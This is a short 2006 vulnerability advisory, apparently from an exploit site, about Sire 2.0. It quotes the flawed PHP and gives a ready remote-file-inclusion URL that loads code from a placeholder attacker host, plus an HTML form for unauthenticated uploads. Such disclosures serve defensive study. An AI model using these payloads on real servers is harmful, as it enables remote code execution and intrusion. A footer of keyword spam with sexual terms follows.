about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability



2006-04-10 Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability 
Rated as : Moderate Risk

[+]File Inclusion:
       Input passed to the "rub" parameter in
"lire.php" isn't properly verified,
       before it is used to include remote files
       Successful exploitation requires that "register_globals"
is enabled.

[lire.php code]
<?
       73             
if(empty($_GET["rub"])){$rub=rtrim($rubriques[0]);} else
{$rub=$_GET["rub"];}
       75              include($rub."/compter.php"); ## File
Inclusion !!

       298             echo $rub; ## XSS
?>

[+]Exploit: Exploit
http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1
[+]http://[attacker]/compter.php Will be Included And Executed withe the
privilege of the webserver


File Upload
Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
[upload.php code:]
<?
if( isset($_POST['upload']) ) // si formulaire soumis
{
#Upload code ....
}
?>
Exploit :

<form enctype="multipart/form-data" method="post"
action="http://Trajet/upload.php?">
Download File<br>
<input name="fichier" type="file"
size="48"><br>
<input type="submit" name="upload"
value="uploader"><form>


securitydot.net - 2006-04-10

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 09:02:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexcypictu t784t animal rip home sex v t433t mambo Remo SexyWALLPA network ag www.teneel www.sex300 phpHtmlLib phpBB ACP mambo Remo geirl+sexy sex free Www.videu +Powered+b PORNOTV. Tila tequi linksys be Www shreya Antarvasna sexvideos PORNOTV. rapes SquirrelMa Www.lankas t24t dastane ma crack+data php advanc com_dbquer anarkale s /component ashly tisd chhris bro Yideosex joomla com t239t 200 /compo Saniasexy t239t search/exp Pical big pennis www.sex98 vBulletin t24t harry pott lezbuan